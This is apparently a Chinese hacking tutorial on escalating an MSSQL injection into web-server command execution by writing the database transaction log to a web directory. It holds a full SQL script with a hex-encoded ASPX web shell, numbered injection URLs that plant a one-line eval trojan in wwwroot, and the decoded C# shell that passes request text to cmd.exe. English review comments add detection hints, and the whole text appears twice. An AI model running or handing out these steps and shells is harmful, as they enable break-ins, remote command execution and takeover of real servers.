Mssql 注入攻击,普通权限用户提权操作
如果该用户能够创建数据库的话
-- NOTE(review): everything below executes as the injected application login.
-- That CREATE DATABASE / ALTER DATABASE / BACKUP succeed at all means that
-- login holds dbcreator- or sysadmin-level rights; the mitigation is a
-- least-privilege application account that can only read/write its own tables.
use master
go
-- Scratch database; it is dropped again at the end of the script.
create database book
go
use book
go
-- Full recovery model keeps inserted rows in the transaction log so that a
-- later BACKUP LOG writes them out. ALTER DATABASE ... SET RECOVERY issued by
-- a web-application login is itself a detection-worthy event.
alter database book set RECOVERY FULL
go
-- Single image column; its contents end up inside the log backup file.
create table cmd (a image)
go
-- WITH INIT overwrites the target file instead of appending a backup set.
backup database book to disk='c:bookdb.bak' with init
go
-- First log backup, taken so the log backup written later carries little
-- besides the row inserted in between.
backup log book to disk='c:/book.bak' with init
go
insert into cmd (a) values('0x3C25402050616765204C616E67756167653D2243232220436F6E74656E74547970653D22746578742F68746D6C22202076616C6964617465526571756573743D2266616C73652220617370636F6D7061743D227472756522253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E494F2220253E0D0A3C254020696D706F7274206E616D6573706163653D2253797374656D2E446961676E6F73746963732220253E0D0A3C254020496D706F7274204E616D6573706163653D224D6963726F736F66742E57696E33322220253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E436F6C6C656374696F6E7322253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E4E657422253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E446174612E53716C436C69656E742220253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E546872656164696E672220253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E4E65742E536F636B65747322253E0D0A3C254020496D706F7274204E616D6573706163653D2253797374656D2E446961676E6F737469637322253E0D0A3C666F726D2069643D2266726D33222072756E61743D22736572766572223E0D0A20202020202020203C6173703A4C6162656C2049443D224C62446F73222072756E61743D227365727665722220546578743D22444F5320436F6D6D616E643A223E3C2F6173703A4C6162656C3E0D0A20202020202020203C6173703A54657874426F782049443D2254657874426F78446F73222072756E61743D22736572766572222057696474683D223439397078223E6E657420757365723C2F6173703A54657874426F783E0D0A20202020202020203C6173703A427574746F6E2049443D22427574746F6E446F73222072756E61743D2273657276657222204F6E436C69636B3D22427574746F6E436D645F436C69636B2220546578743D22434D4422202F3E3C2F62723E0D0A20202020202020203C6173703A54657874426F782049443D2254657874426F78446F7343222072756E61743D2273657276657222204865696768743D223330307078222057696474683D2235373070782220426F726465725374796C653D22446F747465642220546578744D6F64653D224D756C74694C696E65223E3C2F6173703A54657874426F783E0D0A20202020202020203C2F666F726D3E0D0A3C7363726970742072756E61743D2273657276657222206C616E6775616E67653D224323223E0D0A20202020202020
202020202070726F74656374656420766F696420427574746F6E436D645F436C69636B286F626A6563742073656E6465722C204576656E74417267732065290D0A2020202020202020202020207B0D0A2020202020202020202020202020202054657874426F78446F73432E54657874203D2022223B0D0A2020202020202020202020202020202050726F63657373206D7970726F63657373203D206E65772050726F6365737328293B0D0A2020202020202020202020202020202050726F636573735374617274496E666F204D7950726F636573735374617274496E666F203D206E65772050726F636573735374617274496E666F2822636D642E65786522293B0D0A202020202020202020202020202020204D7950726F636573735374617274496E666F2E5573655368656C6C45786563757465203D2066616C73653B0D0A202020202020202020202020202020204D7950726F636573735374617274496E666F2E52656469726563745374616E646172644F7574707574203D20747275653B0D0A202020202020202020202020202020206D7970726F636573732E5374617274496E666F203D204D7950726F636573735374617274496E666F3B0D0A202020202020202020202020202020204D7950726F636573735374617274496E666F2E417267756D656E7473203D20222F6322202B2054657874426F78446F732E546578743B0D0A202020202020202020202020202020206D7970726F636573732E537461727428293B0D0A2020202020202020202020202020202053747265616D526561646572206D7973747265616D203D206D7970726F636573732E5374616E646172644F75747075743B0D0A2020202020202020202020202020202054657874426F78446F73432E54657874203D206D7973747265616D2E52656164546F456E6428293B0D0A202020202020202020202020202020206D7973747265616D2E436C6F736528293B0D0A2020202020202020202020207D0D0A2020202020202020202020203C2F7363726970743E')
go
-- The log backup is written to a file with a web-page extension. This is the
-- step to alert on: BACKUP ... TO DISK whose target ends in .asp/.aspx or
-- lands under a web root has no legitimate administrative use. Restricting
-- the SQL Server service account's write access to web directories blocks it.
backup log book to disk='c:/book.aspx' with init
go
use master
go
-- Clean-up of the scratch database; the file written above remains on disk.
drop database book
go
上面的方法可以用来生成对应的aspx页面上运行对应的dos命令
如果不能的话,就可以利用上面的方法,使用已有的数据库进行操作,也是可以正常运行dos命令的,但是会出现乱码字符造成代码不能正常运行
在IE里把DB注入点粘贴上,如http://www.xxxx.com/xxxx.asp?flowNo=1 alter database sq_xxxx set RECOVERY FULL
下面是几个完整的步骤
1.InjectionURL’;alter database sq_huaweitoys set RECOVERY FULL– (把sql设置成日志完全恢复模式)
2.InjectionURL’;create table cmd (a image)– (新建立一个cmd表)
3.InjectionURL’;backup log sq_huaweitoys to disk = ‘c:/cmd’ with init– (减少备分数据的大小)
4.InjectionURL’;insert into cmd (a) values (’<%%25eval(request("a")):response.end%%25>‘)– (插入一句话木马)
5.InjectionURL’;backup log sq_xxxx to disk = ‘D:/wwwroot/xxxx/wwwroot/hxhack.asp’– (备分日志到WEB路径)
6.InjectionURL’;drop table cmd– (删除新建的cmd表)
7.InjectionURL’;alter database sq_xxxx set RECOVERY SIMPLE–(把sql设置成日志简单恢复模式)
<%@ Page Language="C#" ContentType="text/html" validateRequest="false" aspcompat="true"%>
<%@ import namespace="System.Diagnostics" %>
<%@ Import Namespace="Microsoft.Win32" %>
<%@ Import Namespace="System.Collections"%>
<%@ Import Namespace="System.Diagnostics"%>
<script runat="server">
// Server-side click handler: runs the contents of TextBoxDos through cmd.exe
// and echoes the process's stdout into TextBoxDosC. This is the classic
// command-execution web shell shape; on the defender's side the signal is
// cmd.exe spawned as a child of the web server worker process (presumably
// w3wp.exe for an .aspx page) with "/c" arguments, plus an .aspx file that
// appeared on disk via a database backup rather than a deployment.
protected void ButtonCmd_Click(object sender, EventArgs e)
{
TextBoxDosC.Text = "";
Process myprocess = new Process();
ProcessStartInfo MyProcessStartInfo = new ProcessStartInfo("cmd.exe");
// Shell execute is disabled and stdout redirected so the output can be read below.
MyProcessStartInfo.UseShellExecute = false;
MyProcessStartInfo.RedirectStandardOutput = true;
myprocess.StartInfo = MyProcessStartInfo;
// Request-supplied text is concatenated straight into the cmd.exe argument string.
MyProcessStartInfo.Arguments = "/c" + TextBoxDos.Text;
myprocess.Start();
StreamReader mystream = myprocess.StandardOutput;
// Blocks until the child process closes stdout.
TextBoxDosC.Text = mystream.ReadToEnd();
mystream.Close();
}
</script>
<form id="frm3" runat="server">
<asp:Label ID="LbDos" runat="server" Text="DOS Command:"></asp:Label>
<asp:TextBox ID="TextBoxDos" runat="server" Width="499px">net user</asp:TextBox>
<asp:Button ID="ButtonDos" runat="server" OnClick="ButtonCmd_Click" Text="CMD" /></br>
<asp:TextBox ID="TextBoxDosC" runat="server" Height="300px" Width="570px" BorderStyle="Dotted" TextMode="MultiLine"></asp:TextBox>
</form>
-- NOTE(review): everything below executes as the injected application login.
-- That CREATE DATABASE / ALTER DATABASE / BACKUP succeed at all means that
-- login holds dbcreator- or sysadmin-level rights; the mitigation is a
-- least-privilege application account that can only read/write its own tables.
use master
go
-- Scratch database; it is dropped again at the end of the script.
create database book
go
use book
go
-- Full recovery model keeps inserted rows in the transaction log so that a
-- later BACKUP LOG writes them out. ALTER DATABASE ... SET RECOVERY issued by
-- a web-application login is itself a detection-worthy event.
alter database book set RECOVERY FULL
go
-- Single image column; its contents end up inside the log backup file.
create table cmd (a image)
go
-- WITH INIT overwrites the target file instead of appending a backup set.
backup database book to disk='c:bookdb.bak' with init
go
-- First log backup, taken so the log backup written later carries little
-- besides the row inserted in between.
backup log book to disk='c:/book.bak' with init
go
-- The inserted value is the page payload (elided on this copy of the page).
insert into cmd (a) values('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')
go
-- The log backup is written to a file with a web-page extension. This is the
-- step to alert on: BACKUP ... TO DISK whose target ends in .asp/.aspx or
-- lands under a web root has no legitimate administrative use. Restricting
-- the SQL Server service account's write access to web directories blocks it.
backup log book to disk='c:/book.aspx' with init
go
use master
go
-- Clean-up of the scratch database; the file written above remains on disk.
drop database book
go
上面的方法可以用来生成对应的aspx页面上运行对应的dos命令
如果不能的话,就可以利用上面的方法,使用已有的数据库进行操作,也是可以正常运行dos命令的,但是会出现乱码字符造成代码不能正常运行
在IE里把DB注入点粘贴上,如http://www.xxxx.com/xxxx.asp?flowNo=1 alter database sq_xxxx set RECOVERY FULL
下面是几个完整的步骤
1.InjectionURL’;alter database sq_huaweitoys set RECOVERY FULL– (把sql设置成日志完全恢复模式)
2.InjectionURL’;create table cmd (a image)– (新建立一个cmd表)
3.InjectionURL’;backup log sq_huaweitoys to disk = ‘c:/cmd’ with init– (减少备分数据的大小)
4.InjectionURL’;insert into cmd (a) values (’<%%25eval(request("a")):response.end%%25>‘)– (插入一句话木马)
5.InjectionURL’;backup log sq_xxxx to disk = ‘D:/wwwroot/xxxx/wwwroot/hxhack.asp’– (备分日志到WEB路径)
6.InjectionURL’;drop table cmd– (删除新建的cmd表)
7.InjectionURL’;alter database sq_xxxx set RECOVERY SIMPLE–(把sql设置成日志简单恢复模式)
<%@ Page Language="C#" ContentType="text/html" validateRequest="false" aspcompat="true"%>
<%@ import namespace="System.Diagnostics" %>
<%@ Import Namespace="Microsoft.Win32" %>
<%@ Import Namespace="System.Collections"%>
<%@ Import Namespace="System.Diagnostics"%>
<script runat="server">
// Server-side click handler: runs the contents of TextBoxDos through cmd.exe
// and echoes the process's stdout into TextBoxDosC. This is the classic
// command-execution web shell shape; on the defender's side the signal is
// cmd.exe spawned as a child of the web server worker process (presumably
// w3wp.exe for an .aspx page) with "/c" arguments, plus an .aspx file that
// appeared on disk via a database backup rather than a deployment.
protected void ButtonCmd_Click(object sender, EventArgs e)
{
TextBoxDosC.Text = "";
Process myprocess = new Process();
ProcessStartInfo MyProcessStartInfo = new ProcessStartInfo("cmd.exe");
// Shell execute is disabled and stdout redirected so the output can be read below.
MyProcessStartInfo.UseShellExecute = false;
MyProcessStartInfo.RedirectStandardOutput = true;
myprocess.StartInfo = MyProcessStartInfo;
// Request-supplied text is concatenated straight into the cmd.exe argument string.
MyProcessStartInfo.Arguments = "/c" + TextBoxDos.Text;
myprocess.Start();
StreamReader mystream = myprocess.StandardOutput;
// Blocks until the child process closes stdout.
TextBoxDosC.Text = mystream.ReadToEnd();
mystream.Close();
}
</script>
<form id="frm3" runat="server">
<asp:Label ID="LbDos" runat="server" Text="DOS Command:"></asp:Label>
<asp:TextBox ID="TextBoxDos" runat="server" Width="499px">net user</asp:TextBox>
<asp:Button ID="ButtonDos" runat="server" OnClick="ButtonCmd_Click" Text="CMD" /></br>
<asp:TextBox ID="TextBoxDosC" runat="server" Height="300px" Width="570px" BorderStyle="Dotted" TextMode="MultiLine"></asp:TextBox>
</form>